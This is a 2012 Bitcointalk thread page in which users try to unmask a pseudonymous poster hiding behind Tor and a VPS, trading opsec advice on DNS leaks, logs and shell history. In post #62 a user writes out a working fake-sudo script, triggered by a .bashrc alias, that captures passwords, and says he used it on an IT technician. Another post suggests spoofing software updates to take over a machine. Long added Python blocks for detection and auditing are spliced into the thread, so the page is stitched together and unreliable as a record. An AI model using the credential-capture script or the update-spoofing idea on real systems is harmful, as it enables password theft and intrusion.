
Topic: [joe is dead] http://findmeifyoucan.eu - page 4. (Read 7043 times)

hero member
Activity: 742
Merit: 500
Its as easy as 0, 1, 1, 2, 3
October 28, 2012, 04:01:23 PM
#71
If you are going to pull a heist, it's good to know you're prepared :P
hero member
Activity: 616
Merit: 500
Portland Bitcoin Group Organizer
October 28, 2012, 03:56:24 PM
#70
wow, this bounty keeps climbing, huh?
sr. member
Activity: 477
Merit: 500
October 28, 2012, 03:55:49 PM
#69

I use


  #> ssh -D 0.0.0.0:55555 [email protected] -o ProxyCommand="~/bin/connect -4 -S localhost:9050 %h %p"


to ssh to the VPS and at the same time setup the proxy, which I connect to using


Would it be safe to add -X to the ssh command and then run firefox (or another browser, bitcoin client, etc.) on the VPS (or rent another VPS) to do all Joe's jobs? Also, would it be more secure to use a certificate on a smartcard for the connection, not passwords.
full member
Activity: 238
Merit: 100
October 28, 2012, 02:36:22 PM
#68
-
newbie
Activity: 14
Merit: 1
October 28, 2012, 01:36:48 PM
#67
Curious if Theymos has a sign up IP which is different than the current IP used...

Maybe he's open to helping you guys by releasing any info he has on joe23 (with my consent)?

So if you ask him and he's ok with it, I will give him my consent to publish anything he has on me in this thread.
hero member
Activity: 1078
Merit: 502
October 28, 2012, 01:12:47 PM
#66
Curious if Theymos has a sign up IP which is different than the current IP used...


newbie
Activity: 14
Merit: 1
October 28, 2012, 01:04:24 PM
#65
Problem is I need a non-tor exit point somewhere for bitcointalk.org. Any other ideas on how to post to bitcointalk?

If I remember correctly, only signing up using TOR is banned, you can actually login and post using TOR no problem.

Ah, good to know.

I think you also deserve some payment for your effort if you share an address. I hope I didn't miss anyone else? afaik I so far gave some monetary incentives to:

  • MysteryMiner
  • Jasinlee
  • Openyoureyes
hero member
Activity: 882
Merit: 1005
October 28, 2012, 12:57:54 PM
#64
Problem is I need a non-tor exit point somewhere for bitcointalk.org. Any other ideas on how to post to bitcointalk?

If I remember correctly, only signing up using TOR is banned, you can actually login and post using TOR no problem.
newbie
Activity: 14
Merit: 1
October 28, 2012, 12:54:01 PM
#63
You seem to have most things covered; but, the more complex you make the chain, the easier it is to slip up and forget/misconfigure something.
Everything we're talking about here is what I'm specialising in at University at the moment: digital & anti forensics/security.

cool.

sent a little bit to your address as can be seen in this updated screenshot of Joe's wallet:
(I had to use the VPS proxy to upload it, imgur disallows tor)

http://i.imgur.com/fJdtu.png

OOPS! I accidentally had Electrum's connection setup dialog open when I took the screenshot.
full member
Activity: 238
Merit: 100
October 28, 2012, 12:49:28 PM
#62
What's to stop the hacker from spoofing the DNS record for tormail, SR, etc and sending you to another server.

This is exactly what I was going to do if he gave us (or I managed to get) access to his server. He's using Linux so this doesn't apply, but some commonly installed Windows applications check for updates without forcing the use of https. It isn't too hard to trick the software into running your own "update" which would give you pretty much unrestricted access to do whatever you like on the victim's machine.
I've done things like that in the past, but as you say he's using linux (debian, so nmap says) so its package manager will check the signature of all packages.

Here's something else which I was intending to do:

If he's using bash, then create an alias within .bash_rc, and link sudo calls to a simple password capturing script.
e.g.
within .bash_rc:
alias sudo="passwordCapture.sh"

Now any time sudo is called (e.g. sudo apt-get update); sudo calls the following 'fake sudo' script which logs the password to a file, tells the user it is wrong, and calls the legit sudo program with the arguments originally passed.

Quote
#!/bin/bash
stty -echo
read -p "[sudo] password for $(whoami): " passw; echo
stty echo
echo $passw >> password.txt
echo "Sorry, try again."
echo "sudo $*" | sh


I did this many years ago to my old IT technician, but made the script more fancy by deleting any references once it had completed: he was none the wiser.

--
Thanks joe23, got your transfer.
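Added example, not code from the thread: a defender's counterpart to the .bashrc alias trick described in this post. It hashes the shell start-up files into a baseline, reports which of them changed afterwards, and scans them for aliases or shell functions that shadow commands that prompt for a password. The names (audit_home, baseline, compare, SENSITIVE_COMMANDS), the rc file list and the sample rc content are constructed for the example; the line it detects at the end is the alias from the post.

```python
"""Baseline and diff shell start-up files, and flag aliases that shadow privileged commands."""
import hashlib
import os
import re
import tempfile

# Commands that prompt for a secret and are therefore the ones a tampered rc
# file would most likely wrap; assumed list, extend it for the host in question.
SENSITIVE_COMMANDS = ("sudo", "su", "ssh", "gpg", "passwd")
RC_NAMES = (".bashrc", ".bash_profile", ".profile", ".bash_aliases")

ALIAS_RE = re.compile(r"^\s*alias\s+([A-Za-z_][\w-]*)=")
FUNC_RE = re.compile(r"^\s*(?:function\s+)?([A-Za-z_][\w-]*)\s*\(\s*\)")


def shadowed_commands(rc_text):
    """Return (line_no, command, line) for each alias/function shadowing a sensitive command."""
    hits = []
    for no, line in enumerate(rc_text.splitlines(), 1):
        for pat in (ALIAS_RE, FUNC_RE):
            m = pat.match(line)
            if m and m.group(1) in SENSITIVE_COMMANDS:
                hits.append((no, m.group(1), line.strip()))
                break
    return hits


def rc_files(home):
    return [os.path.join(home, n) for n in RC_NAMES]


def audit_home(home):
    """Scan every existing rc file under home; return (path, line_no, command, line)."""
    found = []
    for path in rc_files(home):
        if os.path.isfile(path):
            with open(path, encoding="utf-8", errors="replace") as fh:
                for no, cmd, line in shadowed_commands(fh.read()):
                    found.append((path, no, cmd, line))
    return found


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def baseline(paths):
    """Map each path to its SHA-256, or None if the file does not exist (yet)."""
    return {p: (sha256_file(p) if os.path.isfile(p) else None) for p in paths}


def compare(old, new):
    """Diff two baselines into sorted added / removed / changed path lists."""
    paths = set(old) | set(new)
    added = sorted(p for p in paths if old.get(p) is None and new.get(p) is not None)
    removed = sorted(p for p in paths if old.get(p) is not None and new.get(p) is None)
    changed = sorted(p for p in paths
                     if old.get(p) is not None and new.get(p) is not None and old[p] != new[p])
    return {"added": added, "removed": removed, "changed": changed}


def append_line(path, text):
    """Append one line to a file; used here only to simulate a later modification."""
    with open(path, "a", encoding="utf-8") as fh:
        fh.write(text + "\n")


def make_sample_home():
    """Constructed throwaway home directory with a harmless .bashrc."""
    home = tempfile.mkdtemp(prefix="home-")
    with open(os.path.join(home, ".bashrc"), "w", encoding="utf-8") as fh:
        fh.write("# constructed sample rc file\nalias ll='ls -l'\n")
    return home


if __name__ == "__main__":
    home = make_sample_home()
    before = baseline(rc_files(home))
    # simulate the modification from the post and show both checks catching it
    append_line(os.path.join(home, ".bashrc"), 'alias sudo="passwordCapture.sh"')
    print(compare(before, baseline(rc_files(home))))
    print(audit_home(home))
```

The hash baseline catches any edit to the listed files (a real host would keep it off-box or signed, and would extend the list to /etc/profile, /etc/bash.bashrc and the files under /etc/profile.d); the alias scan is the cheap second check that tells you what the change did. `type sudo` in the affected shell is the one-liner equivalent of audit_home for a single command.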
full member
Activity: 238
Merit: 100
October 28, 2012, 12:39:36 PM
#61
You seem to have most things covered; but, the more complex you make the chain, the easier it is to slip up and forget/misconfigure something.
Everything we're talking about here is what I'm specialising in at University at the moment: digital & anti forensics/security.

OpenYourEyes, I'd like to reward your effort if you give me an address, I will.

:) Thanks.
1HUnQSAEto29XC5PeHUbaWkPUhec7W7DJN

I'm off to grab a bite to eat; I'll rack my brains when I come back to see what else can be done/is being missed. Hopefully we can get even more input from people on this as well.
hero member
Activity: 742
Merit: 500
Its as easy as 0, 1, 1, 2, 3
October 28, 2012, 12:34:08 PM
#60
I thought you were dailyanarchist for a while, but couldn't find anything connecting it to your profile.
newbie
Activity: 14
Merit: 1
October 28, 2012, 12:32:41 PM
#59
These posting times could lead to something. He cannot post two posts at the same time (well, could, but most likely not). But Joe and the actual person are, for example, awake at the same time. Would need some statistics.

I think this could be a viable attack.

It would involve some serious page-scraping of bitcointalk. Assuming you guys do that and then have the posting times of all bitcointalk users you could compute a likelihood of each user being "real me" using various heuristics. Especially over a long period of time, combined with my roughly known timezone info and maybe some manual language analysis in the end, this could potentially boil it down to maybe a handful of users that would then be suspects.

I would consider that to be a pretty dangerous development for my anonymity.
newbie
Activity: 14
Merit: 1
October 28, 2012, 12:24:58 PM
#58
thanks, OpenYourEyes for chipping in. That's some valuable info.

Let me answer some of your questions:

Long and scattered post but here's my 2c.

How are you connecting to the server to administrate it? Do you use SSH over TOR? ||Home (TOR)||  >  ||Server (SSH)||
Are you using Firefox to tunnel your internet activity?

I use


  #> ssh -D 0.0.0.0:55555 [email protected] -o ProxyCommand="~/bin/connect -4 -S localhost:9050 %h %p"


to ssh to the VPS and at the same time setup the proxy, which I connect to using


  #> chromium-browser --proxy-server="socks5://localhost:55555"


I only use chrome through that VPS proxy for bitcointalk. All other browsing activity I do with firefox through tor (use localhost:9050 as proxy).

Very good point about the DNS leaks! Officials could probably eavesdrop on the dns server and identify my IP through timing, right?

Would my idea of ensuring at my home router that the box can only go out through tor (drop all other packets, is that even possible?) help against such "accidental" leaking? Any ideas on how to protect against such accidents in a fool-proof way?

In either case, you need to watch out for DNS leaks. By default, SSH & Firefox (and most applications) will not do DNS lookups through a proxy.

So, if you browse to google.com, your web traffic will be encrypted and tunnelled as you expect, but the DNS request (i.e. what is the IP of google) will come from your home internet connection. In firefox (don't know if it affects other browsers), this 'bug' is easily rectified. Go to about:config and set remote.dns to true.
If you connect to your server by running SSH over TOR then never specify the hostname (i.e. ssh findmeifyoucan.eu, or any other domain), as this, again, will force a non-tunnelled DNS lookup. Always use the IP.

A few other things:
  • Watch out for any information you leave on the server through log files, etc. (Does a: grep xx.xx.xx.xx /var/log/* -R where xx is your real IP, come up with anything.)

I sure as hell won't enter my real IP in the VPS shell at any time. You sneaky guys might have compromised the machine already and are likely keylogging ;). I might look through the logs manually, though.

  • Install some sort of IDS on your server to monitor for new installations/modifications. If this gets compromised then so are you (regardless of whether you're connecting over TOR). What's to stop the hacker from spoofing the DNS record for tormail, SR, etc and sending you to another server.

I use onion url http://jhiwjjlqpyawmpjx.onion to access tormail using firefox. As said before, I only use the VPS as proxy for bitcointalk.org because they disallow tor.

  • Take a look through your .bash_history, it will show all the commands you've executed: things you've done, files you've modified, etc. which could aid an attacker if they gain access. Disable it in your .bash_rc or just ln -s ~/.bash_history /dev/null
  • Why are you tunnelling all your traffic from your server? As you said yourself, all your traffic originates from one IP address.

I might've said that wrong before. I don't tunnel all traffic through the VPS, just when I need to access sites that don't allow tor connections. Sorry about that misinformation, it was not intentional. I will not try to mislead you guys, at least not at this point, only when you're getting close ;)

  • Even if nobody knows the true identity of the person behind this IP, you're leaving an easy trail for people to follow. One lapse in your security, which reveals who owns this IP, and everything then can be linked back to you.
    Why not run TOR on your home machine, tunnel your traffic over SSH to the server, and then run TOR on the server as well? Everything going in and out of the server is going through TOR, then if there is a break in the chain, you'll be protected by your server's IP.

Problem is I need a non-tor exit point somewhere for bitcointalk.org. Any other ideas on how to post to bitcointalk?

OpenYourEyes, I'd like to reward your effort if you give me an address, I will.
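The DNS-leak question in this exchange comes down to what the SOCKS client hands to the proxy. `ssh -D` opens a SOCKS5 listener; a client that passes the hostname through (address type 0x03 in the CONNECT request) leaves the lookup to the far end, while a client that resolves the name first and sends an IP has already asked its local resolver, which is the leak. Chromium normally forwards the hostname to a socks5:// proxy; in Firefox the about:config preference that controls this is network.proxy.socks_remote_dns (true forwards the hostname); curl distinguishes socks5:// (local lookup) from socks5h:// (proxy lookup). The following is an added example, not code from the thread: it builds and parses SOCKS5 CONNECT requests as laid out in RFC 1928 and flags the ones whose lookup happened on the client side. The function names and the sample requests are constructed for illustration; 192.0.2.10 and 2001:db8::1 are documentation addresses, not real hosts.

```python
"""Classify SOCKS5 CONNECT requests by where the DNS lookup happened (RFC 1928)."""
import ipaddress
import struct

# SOCKS5 address types (RFC 1928, section 4)
ATYP_IPV4 = 0x01
ATYP_DOMAIN = 0x03
ATYP_IPV6 = 0x04


def build_connect(host, port):
    """Build the CONNECT request a SOCKS5 client sends after the method handshake.

    A client that already turned the name into an address (local resolver, so
    the lookup left via the home connection) sends ATYP 0x01/0x04; a client
    that leaves resolution to the proxy sends the raw hostname with ATYP 0x03.
    """
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        name = host.encode("idna")
        if not 1 <= len(name) <= 255:
            raise ValueError("hostname must be 1..255 bytes")
        addr = bytes([ATYP_DOMAIN, len(name)]) + name
    else:
        atyp = ATYP_IPV4 if ip.version == 4 else ATYP_IPV6
        addr = bytes([atyp]) + ip.packed
    return bytes([0x05, 0x01, 0x00]) + addr + struct.pack("!H", port)


def parse_connect(req):
    """Parse a SOCKS5 CONNECT request; report destination, port and who resolved DNS."""
    if len(req) < 4 or req[0] != 0x05:
        raise ValueError("not a SOCKS5 request")
    if req[1] != 0x01:
        raise ValueError("only CONNECT (0x01) is handled here")
    atyp = req[3]
    if atyp == ATYP_IPV4:
        end = 4 + 4
        dest = str(ipaddress.IPv4Address(req[4:end]))
    elif atyp == ATYP_IPV6:
        end = 4 + 16
        dest = str(ipaddress.IPv6Address(req[4:end]))
    elif atyp == ATYP_DOMAIN:
        end = 5 + req[4]
        dest = req[5:end].decode("idna")
    else:
        raise ValueError("unknown ATYP 0x%02x" % atyp)
    if len(req) != end + 2:
        raise ValueError("truncated or trailing bytes in request")
    (port,) = struct.unpack("!H", req[end:end + 2])
    resolved_by = "proxy" if atyp == ATYP_DOMAIN else "client"
    return {"dest": dest, "port": port, "dns_resolved_by": resolved_by}


def leaking_requests(requests):
    """Return (dest, port) for every request whose DNS lookup happened client-side."""
    out = []
    for raw in requests:
        info = parse_connect(raw)
        if info["dns_resolved_by"] == "client":
            out.append((info["dest"], info["port"]))
    return out


# Constructed sample traffic, one request per style. 192.0.2.10 and 2001:db8::1
# are documentation addresses (RFC 5737 / RFC 3849), not real hosts.
SAMPLE_REQUESTS = [
    build_connect("bitcointalk.org", 443),   # hostname forwarded: the proxy resolves it
    build_connect("192.0.2.10", 80),          # client resolved the name first: leak
    build_connect("2001:db8::1", 22),         # same, IPv6
]

if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        print(parse_connect(raw))
    print("client-side lookups:", leaking_requests(SAMPLE_REQUESTS))
```

Run as-is it prints the three classifications. The same parse_connect can be applied to the first bytes a tool sends to the `-D` listener (captured on the loopback interface) to audit which of your applications resolve locally before they ever touch the tunnel, which answers the "fool-proof" question more directly than trusting each application's proxy setting.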
sr. member
Activity: 477
Merit: 500
October 28, 2012, 11:25:45 AM
#57
Hey guys,

just got up (hint, hint). yawn.



This obvious hint is either intentionally misleading or correct information, but it indicates a timezone somewhere near UTC. Well, it's weekend, so might also be more to east ;-)

Anyway, Europe, not US. If we can trust that.

These posting times could lead to something. He cannot post two posts at the same time (well, could, but most likely not). But Joe and the actual person are, for example, awake at the same time. Would need some statistics.
hero member
Activity: 882
Merit: 1005
October 28, 2012, 11:18:18 AM
#56
But he has to pay for DNS and the server. Can these payments be tracked?

He paid for the VPS using BTC.
sr. member
Activity: 477
Merit: 500
October 28, 2012, 11:12:37 AM
#55
How are you connecting to the server to administrate it? Do you use SSH over TOR? ||Home (TOR)||  >  ||Server (SSH)||
Are you using Firefox to tunnel your internet activity?

He only needs one ssh connection to the server and then uses the remote just as a standalone pc to do all Joe's jobs. The only connection from his own computer to anything which has anything to do with Joe, is that single ssh connection to that server through tor. And after what you told, it is most likely made directly with the IP address.

Ie; rent a server in a cloud, install linux and X2Go or freeNX or whatever, then never do anything as Joe anywhere else but by using that computer on the cloud.


But he has to pay for DNS and the server. Can these payments be tracked?
hero member
Activity: 882
Merit: 1005
October 28, 2012, 10:02:37 AM
#54
What's to stop the hacker from spoofing the DNS record for tormail, SR, etc and sending you to another server.

This is exactly what I was going to do if he gave us (or I managed to get) access to his server. He's using Linux so this doesn't apply, but some commonly installed Windows applications check for updates without forcing the use of https. It isn't too hard to trick the software into running your own "update" which would give you pretty much unrestricted access to do whatever you like on the victim's machine.
full member
Activity: 238
Merit: 100
October 28, 2012, 09:56:47 AM
#53
Long and scattered post but here's my 2c.

How are you connecting to the server to administrate it? Do you use SSH over TOR? ||Home (TOR)||  >  ||Server (SSH)||
Are you using Firefox to tunnel your internet activity?

In either case, you need to watch out for DNS leaks. By default, SSH & Firefox (and most applications) will not do DNS lookups through a proxy.

So, if you browse to google.com, your web traffic will be encrypted and tunnelled as you expect, but the DNS request (i.e. what is the IP of google) will come from your home internet connection. In firefox (don't know if it affects other browsers), this 'bug' is easily rectified. Go to about:config and set remote.dns to true.
If you connect to your server by running SSH over TOR then never specify the hostname (i.e. ssh findmeifyoucan.eu, or any other domain), as this, again, will force a non-tunnelled DNS lookup. Always use the IP.

A few other things:
  • Watch out for any information you leave on the server through log files, etc. (Does a: grep xx.xx.xx.xx /var/log/* -R where xx is your real IP, come up with anything.)
  • Install some sort of IDS on your server to monitor for new installations/modifications. If this gets compromised then so are you (regardless of whether you're connecting over TOR). What's to stop the hacker from spoofing the DNS record for tormail, SR, etc and sending you to another server.
  • Take a look through your .bash_history, it will show all the commands you've executed: things you've done, files you've modified, etc. which could aid an attacker if they gain access. Disable it in your .bash_rc or just ln -s ~/.bash_history /dev/null
  • Why are you tunnelling all your traffic from your server? As you said yourself, all your traffic originates from one IP address. Even if nobody knows the true identity of the person behind this IP, you're leaving an easy trail for people to follow. One lapse in your security, which reveals who owns this IP, and everything then can be linked back to you.
    Why not run TOR on your home machine, tunnel your traffic over SSH to the server, and then run TOR on the server as well? Everything going in and out of the server is going through TOR, then if there is a break in the chain, you'll be protected by your server's IP.
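As an added example (not code from the thread), this Python script does the two server-side checks from the bullets above. It searches a log tree for a whole-address match of a given IP, tightening the plain `grep xx.xx.xx.xx /var/log/* -R` so that the dots are literal and 192.0.2.1 does not also hit 192.0.2.10, and it checks whether bash history is being written, turning it off the way the bullet suggests (the symlink is created as `ln -s /dev/null ~/.bash_history`, target first, link name second). The log lines, the home directory and the names scan_logs_for_ip, history_is_disabled and disable_history are constructed for the example; 192.0.2.0/24 and 198.51.100.0/24 are documentation ranges.

```python
"""Check a server's log tree for a given IP and whether shell history is being written."""
import ipaddress
import os
import re
import tempfile


def ip_pattern(ip):
    """Regex that matches `ip` only as a whole address.

    A bare `grep 1.2.3.4` also matches 1.2.3.40 or 1x2x3x4, because '.' is a
    wildcard and nothing anchors either end; this escapes the dots and refuses
    a neighbouring digit or dot on both sides.
    """
    ipaddress.ip_address(ip)  # reject a malformed address up front
    return re.compile(r"(?<![0-9.])" + re.escape(ip) + r"(?![0-9.])")


def scan_logs_for_ip(log_dir, ip):
    """Walk log_dir recursively; return (path, line_no, line) for every hit."""
    pat = ip_pattern(ip)
    hits = []
    for root, _dirs, files in os.walk(log_dir):
        for name in sorted(files):
            path = os.path.join(root, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for no, line in enumerate(fh, 1):
                    if pat.search(line):
                        hits.append((path, no, line.rstrip("\n")))
    return hits


def history_is_disabled(home):
    """True if ~/.bash_history points at /dev/null or an rc file turns HISTFILE off."""
    hist = os.path.join(home, ".bash_history")
    if os.path.islink(hist) and os.readlink(hist) == "/dev/null":
        return True
    off = ("unset HISTFILE", "HISTFILE=/dev/null", "export HISTFILE=/dev/null")
    for rc in (".bashrc", ".bash_profile", ".profile"):
        path = os.path.join(home, rc)
        if not os.path.isfile(path):
            continue
        with open(path, encoding="utf-8", errors="replace") as fh:
            if any(line.strip().startswith(off) for line in fh):
                return True
    return False


def disable_history(home):
    """Replace ~/.bash_history with a symlink to /dev/null (ln -s /dev/null ~/.bash_history)."""
    hist = os.path.join(home, ".bash_history")
    if os.path.lexists(hist):
        os.remove(hist)
    os.symlink("/dev/null", hist)


def make_sample_host():
    """Build a constructed throwaway host tree: a few log lines plus a home directory."""
    base = tempfile.mkdtemp(prefix="audit-")
    log_dir = os.path.join(base, "var", "log")
    home = os.path.join(base, "home", "joe")
    os.makedirs(os.path.join(log_dir, "nginx"))
    os.makedirs(home)
    with open(os.path.join(log_dir, "auth.log"), "w", encoding="utf-8") as fh:
        fh.write("Oct 28 11:25:45 vps sshd[1001]: Accepted publickey for joe from 192.0.2.10 port 51234 ssh2\n"
                 "Oct 28 11:30:02 vps sshd[1002]: Accepted publickey for joe from 192.0.2.100 port 51240 ssh2\n")
    with open(os.path.join(log_dir, "nginx", "access.log"), "w", encoding="utf-8") as fh:
        fh.write('192.0.2.10 - - [28/Oct/2012:12:54:01 +0000] "GET / HTTP/1.1" 200 512\n'
                 '198.51.100.7 - - [28/Oct/2012:12:55:13 +0000] "GET /robots.txt HTTP/1.1" 404 162\n')
    with open(os.path.join(home, ".bash_history"), "w", encoding="utf-8") as fh:
        fh.write("ssh -D 0.0.0.0:55555 joe@vps\n")  # constructed history line
    return log_dir, home


if __name__ == "__main__":
    log_dir, home = make_sample_host()
    for path, no, line in scan_logs_for_ip(log_dir, "192.0.2.10"):
        print(f"{path}:{no}: {line}")
    print("history disabled:", history_is_disabled(home))
    disable_history(home)
    print("history disabled:", history_is_disabled(home))
```

On a real host you would point scan_logs_for_ip at /var/log (and at rotated, compressed logs, which this version does not open) and run it as a user that can read them; the point of the anchored pattern is that a clean result actually means "not present" rather than "not matched by a sloppy regex".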
hero member
Activity: 1078
Merit: 502
October 28, 2012, 09:56:25 AM
#52
AndrewBUD.

I analyse your England. Derp.

BTC goes here 1H8uBfk6bw8kj3CWurjct5KHKe6NY3HAp4
Thanks.

Nop... not me.. Nice to see my name mentioned though...


I could care less if you guys know who I am IRL...............